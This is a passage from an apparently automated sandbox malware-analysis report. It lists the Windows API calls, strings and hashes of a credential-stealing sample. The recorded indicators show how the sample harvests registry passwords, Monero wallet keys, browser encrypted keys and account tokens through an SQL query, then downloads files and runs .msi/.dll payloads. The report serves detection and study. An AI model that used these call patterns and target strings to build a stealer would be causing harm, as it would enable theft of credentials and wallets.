                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: dcb708c4190260a6ec4a748979d1ae4aa5b6448c206b9641b503f4044403f30b
                  • Instruction ID: e64ea95f77d809104f4d141f13c1adf7088fd9774d0fe27398c153fd97e7c13e
                  • Opcode Fuzzy Hash: dcb708c4190260a6ec4a748979d1ae4aa5b6448c206b9641b503f4044403f30b
                  • Instruction Fuzzy Hash: 15120D71810108AADB19FBA0DC92FEEB778AF94300F504169F54776191EF742B4ACFA6
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 00926280: InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
                    • Part of subcall function 00926280: StrCmpCA.SHLWAPI(?,0105E790), ref: 00926303
                    • Part of subcall function 00926280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
                    • Part of subcall function 00926280: HttpOpenRequestA.WININET(00000000,GET,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00926385
                    • Part of subcall function 00926280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
                    • Part of subcall function 00926280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935318
                  • lstrlen.KERNEL32(00000000), ref: 0093532F
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00935364
                  • lstrlen.KERNEL32(00000000), ref: 00935383
                  • lstrlen.KERNEL32(00000000), ref: 009353AE
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: faeec002b4c400a5992651840c55820aa66f70af09f150c856e3b58d72daf459
                  • Instruction ID: c8bb48455419a3da6039e7a1ba6c6d16ebb9e74e2cd1af84ace3d08270510dff
                  • Opcode Fuzzy Hash: faeec002b4c400a5992651840c55820aa66f70af09f150c856e3b58d72daf459
                  • Instruction Fuzzy Hash: 4D51D970910148ABCB18EF60D996BEE7779AF94300F504018F446AB592EF346B46DFA6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 482e7d00b5f555caf8c6f157c38ae8ef183608bb717676e2c074c4b759e9d5a0
                  • Instruction ID: b23a234bf21e1a9e20eb3e6286bb9063655c234737e0bc551e947bbbb09d6d2d
                  • Opcode Fuzzy Hash: 482e7d00b5f555caf8c6f157c38ae8ef183608bb717676e2c074c4b759e9d5a0
                  • Instruction Fuzzy Hash: ECC1A6B59002199BCF14EF60DC89FEE7379BBA4304F104598F50AA7291EF74AA85CF91
                  APIs
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009342EC
                  • lstrcat.KERNEL32(?,0105E360), ref: 0093430B
                  • lstrcat.KERNEL32(?,?), ref: 0093431F
                  • lstrcat.KERNEL32(?,0105DDB8), ref: 00934333
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 00938D90: GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F
                    • Part of subcall function 00929CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00929D39
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 009393C0: GlobalAlloc.KERNEL32(00000000,009343DD,009343DD), ref: 009393D3
                  • StrStrA.SHLWAPI(?,0105EC20), ref: 009343F3
                  • GlobalFree.KERNEL32(?), ref: 00934512
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
                    • Part of subcall function 00929AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
                    • Part of subcall function 00929AC0: LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 009344A3
                  • StrCmpCA.SHLWAPI(?,009408D1), ref: 009344C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009344D2
                  • lstrcat.KERNEL32(00000000,?), ref: 009344E5
                  • lstrcat.KERNEL32(00000000,00940FB8), ref: 009344F4
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 2b35810416edf9ba1e8179e89fe7c943d37310d05e0fdc69f09707fe1091a317
                  • Instruction ID: 35c2ede3c1b4c82ef15a170e5134e92e6b8132b374222c304583fe3a5be8f32f
                  • Opcode Fuzzy Hash: 2b35810416edf9ba1e8179e89fe7c943d37310d05e0fdc69f09707fe1091a317
                  • Instruction Fuzzy Hash: E97134B6900218ABCF14EBA0DC85FEE777DAB88300F044598F605A7181EE75EB45CFA1
                  APIs
                    • Part of subcall function 009212A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009212B4
                    • Part of subcall function 009212A0: RtlAllocateHeap.NTDLL(00000000), ref: 009212BB
                    • Part of subcall function 009212A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009212D7
                    • Part of subcall function 009212A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009212F5
                    • Part of subcall function 009212A0: RegCloseKey.ADVAPI32(?), ref: 009212FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0092134F
                  • lstrlen.KERNEL32(?), ref: 0092135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00921377
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 00938B60: GetSystemTime.KERNEL32(00940E1A,0105C720,009405AE,?,?,009213F9,?,0000001A,00940E1A,00000000,?,01059110,?,\Monero\wallet.keys,00940E17), ref: 00938B86
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00921465
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 009214EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 6a07b718d5e74076417b3b402d6ef634215e1908b3c57b9dc7150259a07ea4ef
                  • Instruction ID: 3dfc3f925c5e8ab6868ff94c3daeeaf607e74e55406001be7007991881036984
                  • Opcode Fuzzy Hash: 6a07b718d5e74076417b3b402d6ef634215e1908b3c57b9dc7150259a07ea4ef
                  • Instruction Fuzzy Hash: 4E5123B1D5011957CB15FB60DD92FEE737CAF94300F404198B64AA2091EE746B89CFA6
                  APIs
                    • Part of subcall function 009272D0: memset.MSVCRT ref: 00927314
                    • Part of subcall function 009272D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0092733A
                    • Part of subcall function 009272D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009273B1
                    • Part of subcall function 009272D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0092740D
                    • Part of subcall function 009272D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00927452
                    • Part of subcall function 009272D0: HeapFree.KERNEL32(00000000), ref: 00927459
                  • lstrcat.KERNEL32(00000000,009417FC), ref: 00927606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00927648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0092765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0092768F
                  • lstrcat.KERNEL32(00000000,00941804), ref: 009276A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009276D3
                  • lstrcat.KERNEL32(00000000,00941808), ref: 009276ED
                  • task.LIBCPMTD ref: 009276FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: 1e60f64e03098ceb0e5bf869717e3f4cf43ce3ada88041b4e0e27ced7f8eddc8
                  • Instruction ID: 07aa1f3872dc9d0d4db247de71d11f079a3960edae21e423330d69a5a9ba0635
                  • Opcode Fuzzy Hash: 1e60f64e03098ceb0e5bf869717e3f4cf43ce3ada88041b4e0e27ced7f8eddc8
                  • Instruction Fuzzy Hash: 5A316972901109EBCF04EBE4EC86EEFB778AB85305B104418E102B72A5DE78A946CF52
                  APIs
                  • memset.MSVCRT ref: 00927314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0092733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009273B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0092740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00927452
                  • HeapFree.KERNEL32(00000000), ref: 00927459
                  • task.LIBCPMTD ref: 00927555
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: 451900416bacf8a3f50cffd0ed3c5960ca05798b2b3df16ccaa32c8f938afa42
                  • Instruction ID: e6de044b75732f80be57a5abcaf35accde1823a0a9199a8c647e3112b93b97f8
                  • Opcode Fuzzy Hash: 451900416bacf8a3f50cffd0ed3c5960ca05798b2b3df16ccaa32c8f938afa42
                  • Instruction Fuzzy Hash: 4B612CB59041689BDB24DB50DC51FDAB7B8BF84300F0081E9E649A6185DFB45FC9CF90
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0105E1C8,00000000,?,00940E2C,00000000,?,00000000), ref: 00938130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00938137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00938158
                  • __aulldiv.LIBCMT ref: 00938172
                  • __aulldiv.LIBCMT ref: 00938180
                  • wsprintfA.USER32 ref: 009381AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: ac6d6e9a7a27812871f5be2e493ec67312e290dd8de72c5f48ff1f019b2174df
                  • Instruction ID: 8b4e4b41c0da2525c338534038c1e5f4824a8b57366463d143b406f799177038
                  • Opcode Fuzzy Hash: ac6d6e9a7a27812871f5be2e493ec67312e290dd8de72c5f48ff1f019b2174df
                  • Instruction Fuzzy Hash: DA21C9B1A44218ABDB00DFD4DD49FAFB7B8EB44B14F104519F605BB2C0DBB869018FA5
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                  • InternetOpenA.WININET(00940DF7,00000001,00000000,00000000,00000000), ref: 0092610F
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 00926147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0092618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009261B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 009261DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0092620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00926249
                  • InternetCloseHandle.WININET(?), ref: 00926253
                  • InternetCloseHandle.WININET(00000000), ref: 00926260
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: ff0afb06a4e0d7e009de47988838f1f825bc97562eec201e82256e2633586f36
                  • Instruction ID: 409a663e3c9ec6c5dc32323ed19ec11e197677971d1b6925dc72451291623d13
                  • Opcode Fuzzy Hash: ff0afb06a4e0d7e009de47988838f1f825bc97562eec201e82256e2633586f36
                  • Instruction Fuzzy Hash: 79512CB1900218ABDF20DF60DC45BEE77B8EB44705F108498E605A71C5DBB8AA89CF95
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0092BC9F
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0092BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0092BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0092BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 246ffa782e3a6d44ad351c58d272350dc9862e9ba419a5916e117776d56b2bdc
                  • Instruction ID: d289ed3fe18740d39d9b48b48a81d76e40b0a0d4542696b51146bb55f7c06e39
                  • Opcode Fuzzy Hash: 246ffa782e3a6d44ad351c58d272350dc9862e9ba419a5916e117776d56b2bdc
                  • Instruction Fuzzy Hash: B9B12972910108ABDF04EBA0DD96FEE7379AF94300F404568F546B7092EF746A49CFA6
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: eede6f0be63c1a217cea45f7cec07c118dc5db8d035ecf3063e9f88a04aa6cd5
                  • Instruction ID: b5270eb988d7d2190e9b057b27eb06e4852f0e4bf39c2dbc313daf78d0122d7a
                  • Opcode Fuzzy Hash: eede6f0be63c1a217cea45f7cec07c118dc5db8d035ecf3063e9f88a04aa6cd5
